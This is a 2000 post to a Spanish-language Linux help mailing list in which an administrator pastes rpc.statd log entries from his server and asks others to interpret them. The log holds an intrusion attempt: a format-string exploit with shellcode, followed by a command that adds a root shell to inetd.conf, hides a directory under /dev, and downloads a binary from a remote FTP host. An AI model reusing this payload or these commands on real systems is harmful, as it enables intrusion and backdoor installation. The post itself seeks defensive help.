Ataque

To: ayuda en linux org mx
Subject: Ataque
From: "Andrés M. Benavides" <dakar en axtel net>
Date: Tue, 29 Aug 2000 14:58:56 -0500
Sender: owner-ayuda en linux org mx

Buen día:

    Hace poco se posteó un boletín de seguridad aquí en el foro, ok pues

inmediatamente me dí a la tarea de actualizar lo necesario pero
revisando los logs me encontré con ésto en el /var/log/messages se los
mando a ver si alguien me puede ayudar a interpretar. Gracias

Aug 27 23:40:33 quad rpc.statd[397]: SM_MON request for hostname
containing'/':^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ
¿%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%
0242x%n%055x%n%012x%n%0192x%n<90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90>ëK^<89>v¬<83>î<8D>^
(<83>Æ<89>^°<83>î<8D>^.<83>Æ<83>Ã<83>ë#<89>^´1À<83>î<88>F'<88>F*<83>Æ
<88>F«<89>F¸°+, <89>ó<8D>N¬<8D>V¸Í<80>1Û<89>Ø@Í<80>è°ÿÿÿ/bin/sh -c echo
9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall-HUP
inetd; mkdir /dev/... ; cd /dev/... ; ncftpget
ftp://sctrx:sctrxz@206.132.179.136/imp ;chmod+x imp

Aug 27 23:40:33 quad rpc.statd[397]: POSSIBLE SPOOF/ATTACK ATTEMPT!

Aug 27 23:40:33 quad rpc.statd[397]: STAT_FAIL to localhost for SM_MON
of ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x
%08x%08x%08x%08x%08x%08x%08x%08x%08x%0242x%n%055x%n%012x%n%0192x%n<90
90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90>ëK^<89>v¬<83>î
<8D>^(<83>Æ<89>^°<83>î<8D>^.<83>Æ<83>Ã<83>ë#<89>^´1À<83>î<88>F'<88>F*<83>Æ

<88>F«<89>F¸°+, <89>ó<8D>N¬<8D>V¸Í<80>1Û<89>Ø@Í<80>è°ÿÿÿ/bin/sh -c echo
9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall
-HUP inetd; mkdir /dev/... ; cd /dev/... ; ncftpget ftp://sctrx:sctr
xz@206.132.179.136/imp ; chmod +x imp

--
In a world without fences,... who needs gates?

Salu2!
___________________
Andrés M. Benavides
ICQ: 3341979




--
In a world without fences,... who needs gates?

Salu2!
___________________
Andrés M. Benavides
ICQ: 3341979



---------------------------------------------------------
para salir de la lista, enviar un mensaje con las palabras
"unsubscribe ayuda" en el cuerpo a majordomo en linux org mx

Mensaje(s) a continuación:
- Re: Ataque
  - De: Gunnar Wolf

Previo por Fecha: A los usuarios de Prodigy Turbo
Siguiente por Fecha: No conecta con wvdial
Previo por Hilo: A los usuarios de Prodigy Turbo
Siguiente por Hilo: Re: Ataque

[Hilos de Discusión] [Fecha] [Tema] [Autor]